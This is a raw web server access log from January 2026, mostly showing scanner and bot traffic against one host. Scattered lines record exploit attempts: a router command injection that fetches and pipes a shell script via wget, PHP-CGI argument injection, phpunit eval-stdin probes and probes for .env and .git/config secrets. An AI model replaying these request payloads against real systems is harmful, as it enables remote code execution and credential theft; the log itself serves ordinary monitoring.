[Length 1033] [Gzip -] "-" "-" +[22/Jan/2026:04:14:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:04:27:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 209.38.94.255] [Length 568] [Gzip 1.86] "Mozilla/5.0" "-" +[22/Jan/2026:04:27:52 +0000] 405 - POST http 91.82.83.208 "/" [Client 209.38.94.255] [Length 154] [Gzip -] "Mozilla/5.0" "-" +[22/Jan/2026:04:37:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:04:37:44 +0000] 404 - POST http 127.0.0.1 "/GponForm/diag_Form?images/" [Client 45.115.89.49] [Length 122] [Gzip 1.35] "Hello, World" "-" +[22/Jan/2026:04:37:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.115.89.49] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:04:42:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:04:42:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:04:45:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.172.107.249] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:04:45:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 167.172.107.249] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" "-" +[22/Jan/2026:04:49:36 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.37] [Length 1033] [Gzip -] "-" "-" +[22/Jan/2026:05:03:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:05:05:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:05:07:07 +0000] 400 - GET http 91.82.83.208 "/" [Client 3.149.59.26] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[22/Jan/2026:05:07:11 +0000] 400 - GET http 91.82.83.208 "/" [Client 3.149.59.26] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[22/Jan/2026:05:09:25 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:05:14:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.157.174.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[22/Jan/2026:05:16:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[22/Jan/2026:05:28:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:05:31:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 185.180.140.4] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[22/Jan/2026:05:37:24 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:05:38:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:05:41:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:05:53:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:05:56:34 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:05:58:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:06:09:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.106] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:06:09:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.106] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:06:13:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 143.198.98.233] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[22/Jan/2026:06:13:22 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[22/Jan/2026:06:14:51 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[22/Jan/2026:06:17:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:06:22:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.82.70.133] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:06:22:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 80.82.77.202] [Length 1033] [Gzip -] "fasthttp" "-" +[22/Jan/2026:06:22:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.82.77.202] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:06:22:50 +0000] 404 - GET http 91.82.83.208 "/aaa9" [Client 80.82.77.202] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[22/Jan/2026:06:22:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.82.77.202] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:06:22:50 +0000] 404 - GET http 91.82.83.208 "/aab9" [Client 80.82.77.202] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[22/Jan/2026:06:22:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 65.49.1.172] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70" "-" +[22/Jan/2026:06:23:03 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.82.77.202] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:06:23:03 +0000] 404 - GET http 91.82.83.208 "/aaa9" [Client 80.82.77.202] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[22/Jan/2026:06:23:03 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.82.77.202] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:06:23:03 +0000] 404 - GET http 91.82.83.208 "/aab9" [Client 80.82.77.202] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[22/Jan/2026:06:23:44 +0000] 404 - GET http 91.82.83.208 "/webui/" [Client 65.49.1.172] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:141.0) Gecko/20100101 Firefox/141.0" "-" +[22/Jan/2026:06:25:23 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[22/Jan/2026:06:26:12 +0000] 404 - GET http 91.82.83.208 "/geoserver/web/" [Client 65.49.1.172] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70" "-" +[22/Jan/2026:06:27:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:06:43:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:06:46:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:06:48:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:06:52:52 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:07:06:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 45.171.32.50] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.1" "-" +[22/Jan/2026:07:08:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:07:10:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:07:15:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:07:21:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 223.166.22.187] [Length 1033] [Gzip -] "-" "-" +[22/Jan/2026:07:21:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 171.116.47.9] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[22/Jan/2026:07:22:02 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[22/Jan/2026:07:28:14 +0000] 400 - GET http 91.82.83.208 "/manager/text/list" [Client 13.89.124.223] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[22/Jan/2026:07:33:36 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:07:37:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:07:42:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:07:44:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[22/Jan/2026:07:58:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:08:03:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:08:05:07 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:08:16:22 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:08:26:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:08:37:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:08:38:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:08:41:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:08:51:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:08:51:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:08:56:35 +0000] 404 - GET http 91.82.83.208 "/login" [Client 103.252.89.75] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[22/Jan/2026:08:57:36 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:09:08:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/.env" [Client 91.92.241.199] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[22/Jan/2026:09:13:44 +0000] 404 - POST http 91.82.83.208 "/goform/formJsonAjaxReq" [Client 64.34.87.123] [Length 150] [Gzip -] "Go-http-client/1.1" "http://91.82.83.208:80/home.asp" +[22/Jan/2026:09:17:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:09:21:16 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 159.203.33.77] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[22/Jan/2026:09:21:16 +0000] 404 - GET http 91.82.83.208 "/.git/config" [Client 159.203.33.77] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[22/Jan/2026:09:25:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:09:29:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 170.106.72.93] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[22/Jan/2026:09:32:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:09:41:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:09:46:57 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:09:49:28 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:09:50:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:10:00:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:10:06:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:10:12:43 +0000] 404 - GET http 91.82.83.208 "/developmentserver/metadatauploader" [Client 20.65.194.85] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[22/Jan/2026:10:13:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:10:14:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 20.163.15.166] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[22/Jan/2026:10:25:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:10:30:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:10:31:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:10:34:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:10:35:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 194.186.252.237] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[22/Jan/2026:10:36:28 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:10:38:01 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:10:38:14 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh)" [Client 221.159.119.6] [Length 150] [Gzip -] "-" "-" +[22/Jan/2026:10:38:15 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh)" [Client 221.159.119.6] [Length 150] [Gzip -] "-" "-" +[22/Jan/2026:10:45:42 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[22/Jan/2026:10:51:04 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 93.152.217.192] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:10:51:05 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 93.152.217.192] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:10:51:06 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 93.152.217.192] [Length 154] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] 